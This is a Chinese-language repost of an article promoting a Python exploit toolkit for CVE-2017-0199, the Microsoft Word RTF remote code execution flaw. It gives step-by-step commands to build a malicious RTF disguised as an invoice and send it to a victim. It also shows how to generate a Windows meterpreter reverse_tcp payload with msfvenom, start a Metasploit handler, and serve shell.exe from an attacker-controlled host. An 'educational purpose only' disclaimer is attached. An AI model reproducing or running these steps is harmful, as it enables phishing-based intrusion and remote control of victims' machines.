针对 CVE-2017-0199 的 Python 漏洞利用脚本

  • A+
所属分类:安全文章

版权声明:

本文首发于微信号:inn0team

此文章版权归属于 原作者bhdresh 所有

转载请务必保留此声明,违者必究。

Exploit toolkit CVE-2017-0199 - v2.0 是一个快速利用 Microsoft RTF RCE漏洞的python脚本。它可以生成恶意的RTF文件,并将 metasploit / meterpreter有效载荷在靶机执行,而不需要任何复杂的配置。

演示视频


开发笔记:

脚本介绍

  1. 创建并生成恶意 RTF 文件

  2. Run toolkit in an exploitation mode as tiny HTA + Web server

  3. 适用版本: Python version 2.7.13

计划功能:

  1. 通过email自动发送恶意 RTF 文件

使用说明:

  • Step 1: 生成恶意 RTF 文件,并发送给靶机。

  1. Syntax:

  2. # python cve-2017-0199_toolkit.py -M gen -w <filename.rtf> -u <http://attacker.com/test.hta>

  3. Example:

  4. # python cve-2017-0199_toolkit.py -M gen -w Invoice.rtf -u http://192.168.56.1/logo.doc

  • Step 2 生成 msf payload,并监听端口

  1. Example:

  2. Generate Payload:

  3. # msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.1 LPORT=4444 -f exe > /tmp/shell.exe

  4. Start Handler:

  5. # msfconsole -x "use multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.56.1; run"

  • Step 3: 利用脚本加载 msf payload

  1. Syntax:

  2. # python cve-2017-0199_toolkit.py -M exp -e <http://attacker.com/shell.exe> -l </tmp/shell.exe>

  3. Example:

  4. # python cve-2017-0199_toolkit.py -M exp -e http://192.168.56.1/shell.exe -l /tmp/shell.exe

脚本相关帮助:

  1. # python cve-2017-0199_toolkit.py -h

  2. This is a handy toolkit to exploit CVE-2017-0199 (Microsoft Word RTF RCE)

  3. Modes:

  4. -M gen                                          Generate Malicious RTF file only

  5.     Generate malicious RTF file:

  6.      -w <Filename.rtf>                   Name of malicious RTF file (Share this file with victim).

  7.      -u <http://attacker.com/test.hta>   The path to an hta file. Normally, this should be a domain or IP where this tool is running.

  8.                                             For example, http://attackerip.com/test.hta (This URL will be included in malicious RTF file and

  9.                                             will be requested once victim will open malicious RTF file.

  10. -M exp                                          Start exploitation mode

  11.     Exploitation:

  12.      -p <TCP port:Default 80>            Local port number.

  13.      -e <http://attacker.com/shell.exe>  The path of an executable file / meterpreter shell / payload  which needs to be executed on target.

  14.      -l </tmp/shell.exe>                 Local path of an executable file / meterpreter shell / payload (If payload is hosted locally).

免责声明

This program is for Educational purpose ONLY. Do not use it without permission. The usual disclaimer applies, especially the fact that me (bhdresh) is not liable for any damages caused by direct or indirect use of the information or functionality provided by these programs. The author or any Internet provider bears NO responsibility for content or misuse of these programs or any derivatives thereof. By using this program you accept the fact that any damage (dataloss, system crash, system compromise, etc.) caused by the use of these programs is not bhdresh's responsibility.


inn0team  一个正在成长的安全团队
微信号:inn0team
针对 CVE-2017-0199 的 Python 漏洞利用脚本
长按可关注我们

点击“阅读原文”直达脚本地址

本文始发于微信公众号(inn0team):针对 CVE-2017-0199 的 Python 漏洞利用脚本

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: